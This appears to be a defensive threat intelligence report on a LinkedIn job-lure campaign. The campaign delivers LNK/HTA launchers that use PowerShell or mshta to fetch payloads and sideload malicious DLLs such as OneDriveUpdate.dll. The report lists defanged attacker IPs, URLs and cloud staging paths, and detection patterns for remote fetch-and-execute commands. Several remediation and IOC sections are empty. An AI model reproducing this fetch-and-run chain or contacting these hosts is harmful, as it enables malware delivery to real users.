Classification: TLP:CLEAR  
Analyst: AI Threat Intelligence

Executive Summary

‍

Multiple sandbox traces and commercial-feeds enrichment show a campaign that begins with LinkedIn messages or job/freelance lures and delivers archives containing decoys and LNK/HTA launchers. The staged chain uses PowerShell and mshta to fetch and expand archives and then relies on DLL sideloading (rundll32/regsvr32) to execute malicious DLLs such as OneDriveUpdate[.]dll and win_oci_*.dll. Delivery and C2 use HTTP(S) endpoints and cloud-hosted storage objects. Blocking and hunting for the observed indicators and command patterns is the highest-priority operational action. Evidence is drawn from sandbox traces and enrichment feeds (Hybrid-Analysis, VirusTotal, Protos) and is summarized with confidence levels below.

Relevant high/medium-confidence technical references are cited in-line where indicators are mentioned (see Evidence References section).

Investigation Objective & Methodology

Original Question: Deep dive into the campaign described by the news headline "Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading" — determine attribution (if possible), malware and TTPs used (DLL sideloading specifics), observable IOCs and infrastructure, and prioritized remediation/mitigation steps for analysts.

Scope: Review of public reporting, sandbox traces, and commercial-feed enrichment focusing on observable IOCs (domains, IPs, URLs, DLL filenames), attack chain, MITRE ATT&CK mapping, and prioritized remediation for SOC/CSIRT teams.

Timeframe: Last 30 days (primary artifacts dated / generated 2026-01-21).

Sources Used: Public OSINT (news summaries), sandbox traces (Hybrid-Analysis sample), and commercial threat-feed enrichment (VirusTotal, Protos) as reflected in reviewed artifacts.

Methodology: Synthesize research and sandbox extraction artifacts, validate findings against the fact-check summary, and prioritize HIGH/MEDIUM-confidence findings for operational use. Low/insufficient-confidence claims (notably actor attribution) are flagged and not presented as confirmed.

Background

Public reporting and sandbox outputs describe a phishing-style campaign that leverages professional social media (LinkedIn) to deliver archives containing decoys and launcher artifacts (LNK/HTA). When opened, these launchers execute scripted fetch-and-run chains (PowerShell/mshta) that unpack payloads and invoke legitimate Windows loaders (rundll32.exe / regsvr32.exe) to sideload malicious DLLs, enabling RAT/backdoor execution.

This pattern is consistent with historical LinkedIn/job-lure campaigns delivering commodity RATs (Remcos, HawkEye, DuckTail) but actor-level attribution for the current cluster is not supported by the reviewed artifacts (LOW confidence).

Technical Analysis

Attack Chain (evidence-backed)

1. Initial Access: Target receives a LinkedIn direct message or shared document link offering freelance/job opportunity or a document to review; message induces download of an archive (RAR/ZIP) containing decoy documents plus an LNK or HTA launcher (MEDIUM confidence — sandbox and reporting).
2. Staging: User opens LNK/HTA which executes mshta or PowerShell to fetch remote scripts/objects and expand archives (HIGH confidence — observed in sandbox traces).
3. Loader / Execution: The chain invokes legitimate Windows loaders (for example, rundll32.exe) to load a malicious DLL placed alongside the loader or directly invoked by a loader (HIGH confidence — sandbox traces show rundll32 invocation). Cite examples: rundll32.exe executed against a malicious DLL such as OneDriveUpdate[.]dll (observed in sandbox traces; review confidence: HIGH).
4. Post-execution: The loaded DLL functions as a loader/backdoor (RAT), establishing HTTP(S)-based C2 or fetching further stages from cloud-hosted objects (MEDIUM confidence — sandbox + feed enrichment).

Observed Indicators & Infrastructure (examples)

• Delivery/C2 IP and URL: hxxp[:]//80[.]76[.]51[.]231/Samarik — observed in sandbox downloads and flagged malicious by enrichment feeds (80[.]76[.]51[.]231, hxxp[:]//80[.]76[.]51[.]231/Samarik) — HIGH/MEDIUM confidence depending on feed.
• Malicious HTA host: mailv[.]mofs-gov[.]org serving an HTA path used in execution (mailv[.]mofs-gov[.]org, hxxp[:]//mailv[.]mofs-gov[.]org/.../files-94603e7f/hta) — HIGH confidence.
• Cloud-hosted staging object: hxxp[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt — observed as a remote script fetch target in sandbox traces and flagged in feed enrichment — MEDIUM confidence.
• Sample / sandbox record: Hybrid-Analysis sample page used as primary sandbox evidence (pull full sample for hashes) — hxxps[:]//hybrid-analysis[.]com/sample/... — HIGH confidence.

Mapped MITRE ATT&CK Techniques (observed / inferred)

• T1598.002: Phishing: Spearphishing via Social Media — LinkedIn messages used to lure recipients (MEDIUM confidence).  
• T1204.002: User Execution: Malicious Link / Shortcut (LNK/HTA) — user opens LNK/HTA leading to execution (HIGH confidence).  
• T1218.005: Mshta — mshta used to execute HTA content (MEDIUM/HIGH confidence).  
• T1059.001: Command and Scripting Interpreter: PowerShell — PowerShell fetch+Expand-Archive+iex observed (HIGH confidence).  
• T1574.001: DLL Side-Loading — use of rundll32/regsvr32 to execute malicious DLLs (HIGH confidence).  
• T1036.005: Masquerading — malicious binaries using legitimate-sounding names (e.g., OneDriveUpdate[.]dll) to evade detection (MEDIUM confidence).  
• T1071.001: Application Layer Protocol: Web Protocols — HTTP/HTTPS-based C2 and cloud-hosted fetch observed (MEDIUM confidence).

Indicators of Compromise (defanged)

All indicators below are defanged (dots -> '[.]', http(s) -> hxxp/hxxps). Only HIGH or MEDIUM confidence IOCs are included (per reviewed fact-check and enrichment artifacts).

Notes: All IOCs above are taken from sandbox traces and enrichment artifacts. Prioritize BLOCK/HUNT for indicators with HIGH confidence first. Do not operationally act on any IOC without applying your internal validation and enrichment process.

Infrastructure Summary

• mailv[.]mofs-gov[.]org: Observed serving an HTA path used in delivery — flagged malicious by sandbox evidence and threat-feed enrichment (HIGH confidence).
• IP / URL cluster: 80[.]76[.]51[.]231 and hxxp[:]//80[.]76[.]51[.]231/Samarik — observed in sandbox download traces and flagged malicious by VirusTotal / Protos enrichment (HIGH confidence).
• Cloud object store: fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com (object new-artist[.]txt) used as a remote script host in observed chains (MEDIUM confidence).

Operational note: Passive scans and WHOIS lookups in the reviewed infrastructure artifact showed inconsistent indexing versus enrichment feeds; absence from passive indexing does not imply benign status. Prioritize internal telemetry correlation and file-hash enrichment (pull full Hybrid-Analysis sample) to strengthen network/infrastructure mapping.

Detection & Hunting Recommendations

Immediate detection rules and hunts (Priority 1 - 🚨):

1. EDR rule: Detect rundll32[.]exe executing DLLs from user-writable locations (Desktop, %TEMP%, %USERPROFILE%) and specifically match OneDriveUpdate[.]dll and win_oci_* filename patterns (HIGH confidence).
2. EDR / SIEM rule: Detect powershell[.]exe invocations with patterns: Invoke-WebRequest / Expand-Archive / iex fetching from remote hosts — hunt for contacts to fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com and 80[.]76[.]51[.]231/Samarik (HIGH confidence).
3. EDR rule: Detect mshta[.]exe executions that reference remote HTA paths or local HTA files originating from user folders; hunt for downloads from mailv[.]mofs-gov[.]org (HIGH confidence).

Hunt patterns & enrichment (Priority 2 - ⚠️):

• Search EDR/telemetry for process trees matching LNK/hta -> mshta/powershell -> rundll32/regsvr32 and capture any dropped DLLs for hashing.
• Correlate related file hashes reported by VirusTotal for 80[.]76[.]51[.]231 against internal telemetry.
• Hunt proxy/web logs for HTTP GET/POST requests to the listed URLs and cloud object paths; extract objects for file-level scanning and submit to VT/Protos.

Detection tuning notes:

• Avoid overly broad blocking of cloud-hosting domains unless object-level confirmation exists; prefer blocking specific paths (e.g., new-artist[.]txt) and IPs/URLs explicitly flagged as malicious.
• Normalize PowerShell encoding/obfuscation when writing detections and include white-listing exceptions for known legitimate services.

Remediation & Mitigation

Immediate Actions (Priority 1 - 🚨)

‍

Short-term Actions (Priority 2 - ⚠️)

‍

Long-term Improvements (Priority 3 - 🎯)

• Harden user education: targeted communication on risks of opening unsolicited LinkedIn attachments/links and procedures to verify recruiters/contacts.
• Application allowlisting: restrict user ability to run rundll32/regsvr32 from non-standard locations and block execution of mshta/powershell when invoked from user document contexts where feasible.
• Improve archive-sandboxing: route compressed archives from external social-media sources through automated sandboxing prior to user delivery.

Confidence & Limitations

High Confidence Findings (evidence available in reviewed artifacts):

• DLL sideloading via rundll32/regsvr32 with OneDriveUpdate[.]dll observed in sandbox traces (HIGH).

Medium Confidence Findings:

• Initial vector via LinkedIn messages with LNK/HTA (MEDIUM) — supported by sandbox and reporting but lacking independent closed-source confirmation.
• Cloud-hosted object staging (fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt) — observed in sandbox and Protos enrichment (MEDIUM).

Low / Insufficient Confidence:

• Actor-level attribution to a named intrusion set or mercenary spyware operator (LOW) — artifacts do not provide multi-source corroboration; closed-source vendor telemetry would be required to raise confidence.

Limitations:

• Reviewed artifacts did not include full file hashes for the primary Hybrid-Analysis sample — file-level hashing is required to broaden AV consensus and linkages.
• Passive scanning and WHOIS lookups returned inconsistent results versus feed enrichment; reconcile by pulling authoritative sandbox records and internal telemetry.

Evidence References

Key evidence items (primary artifacts and enrichment references):

• Hybrid-Analysis sandbox sample page (detailed execution strings, modules, and network calls): hxxps[:]//hybrid-analysis[.]com/sample/0bfcf2c23845a700e67bbdef6fb60528a501f518e4d3ba83a61f997ae40d6530.
• Malicious domain and HTA path observed in sandbox traces and enrichment: mailv[.]mofs-gov[.]org / hxxp[:]//mailv[.]mofs-gov[.]org/.../files-94603e7f/hta.
• Delivery/C2 IP and URL with multi-engine VT detections and Protos labels: 80[.]76[.]51[.]231 / hxxp[:]//80[.]76[.]51[.]231/Samarik.
• Cloud-hosted object used for remote script fetch: fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com / hxxp[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt.
• Observed malicious DLL and execution tool references: OneDriveUpdate[.]dll, win_oci_41aa0d5[.]dll, rundll32[.]exe.

‍

‍

Prepared by: AI Threat Intelligence

‍